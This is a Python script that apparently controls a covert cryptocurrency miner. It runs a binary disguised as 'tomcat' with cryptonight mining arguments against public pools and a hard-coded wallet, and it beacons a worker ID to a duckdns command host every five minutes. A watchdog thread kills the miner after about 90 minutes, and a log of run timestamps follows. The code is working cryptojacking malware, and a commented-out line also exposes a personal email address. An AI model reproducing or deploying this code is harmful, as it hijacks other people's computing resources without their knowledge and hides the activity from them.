import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:04:06.193601
#2018-02-17 16:52:05.277775
#2018-02-17 18:40:05.120773
#2018-02-17 20:28:06.485170
#2018-02-17 22:16:06.251670
#2018-02-17 23:59:06.818896
#2018-02-18 01:50:07.262826
#2018-02-18 03:37:07.240620
#2018-02-18 05:25:08.267772
#2018-02-18 07:18:01.621030
#2018-02-18 09:06:01.718546
#2018-02-18 10:52:05.152288
#2018-02-18 12:39:04.645132
#2018-02-18 14:26:01.473896
#2018-02-18 16:16:02.079591
#2018-02-18 18:03:07.204710
#2018-02-18 19:50:05.332701
#2018-02-18 21:36:02.172195
#2018-02-18 23:24:05.746608
#2018-02-19 01:11:06.259859
#2018-02-19 02:57:05.000139
#2018-02-19 04:44:01.770273
#2018-02-19 06:28:07.522984
#2018-02-19 08:18:06.965844
#2018-02-19 10:07:05.546755
#2018-02-19 11:55:10.403818
#2018-02-19 13:42:04.452796
#2018-02-19 15:32:05.926415
#2018-02-19 17:20:06.877678
#2018-02-19 19:09:08.682377
#2018-02-19 20:56:08.110283
#2018-02-19 22:44:02.111584
#2018-02-20 00:27:05.327138
#2018-02-20 02:15:05.424474
#2018-02-20 04:06:05.109133
#2018-02-20 05:49:07.104538
#2018-02-20 07:35:04.895744
#2018-02-20 09:19:07.030200
#2018-02-20 11:03:08.935678
#2018-02-20 12:49:06.953826
#2018-02-20 14:34:01.929691
#2018-02-20 16:19:10.302237
#2018-02-20 18:06:02.029826
#2018-02-20 19:58:08.546258
#2018-02-20 21:46:06.191939
#2018-02-20 23:29:05.285069
#2018-02-21 01:13:06.449278
#2018-02-21 03:01:06.330829
#2018-02-21 04:49:05.363788
#2018-02-21 06:38:02.204180
#2018-02-21 08:24:01.983237
#2018-02-21 10:09:07.131140
#2018-02-21 11:57:08.101013
#2018-02-21 13:48:04.110391
#2018-02-21 15:33:06.975550
#2018-02-21 17:24:01.882599
#2018-02-21 19:12:07.580454
#2018-02-21 21:01:01.439770
#2018-02-21 22:47:01.618467
#2018-02-22 00:37:03.417122
#2018-02-22 02:24:04.056403
#2018-02-22 04:11:06.387202
#2018-02-22 05:56:04.551864
#2018-02-22 07:42:01.598596
#2018-02-22 09:31:02.034344
#2018-02-22 11:16:09.578563
#2018-02-22 13:01:07.741547
#2018-02-22 14:49:05.938286
#2018-02-22 16:37:02.288148
#2018-02-22 18:24:06.339143
#2018-02-22 20:17:04.944981
#2018-02-22 22:03:08.441651
#2018-02-22 23:51:06.579478
#2018-02-23 01:40:05.317791
#2018-02-23 03:27:01.320368
#2018-02-23 05:12:07.567119
#2018-02-23 06:58:04.822837
#2018-02-23 08:47:02.311632
#2018-02-23 11:01:07.211537
#2018-02-23 12:56:01.456334
#2018-02-23 14:42:01.411951
#2018-02-23 16:32:01.445669
#2018-02-23 18:18:06.296813
#2018-02-23 20:03:04.750959
#2018-02-23 21:46:05.820442
#2018-02-23 23:40:07.280591
#2018-02-24 01:31:06.668013
#2018-02-24 03:21:05.516344
#2018-02-24 05:05:07.127961
#2018-02-24 06:53:06.424356
#2018-02-24 08:43:07.182195
#2018-02-24 10:28:06.047150
#2018-02-24 12:22:07.176853
#2018-02-24 14:16:04.270773
#2018-02-24 16:02:04.413552
#2018-02-24 17:54:04.993410
#2018-02-24 19:41:05.150317
#2018-02-24 21:28:07.647828
#2018-02-25 00:12:04.556775
#2018-02-25 04:22:07.755072
#2018-02-25 07:53:07.066555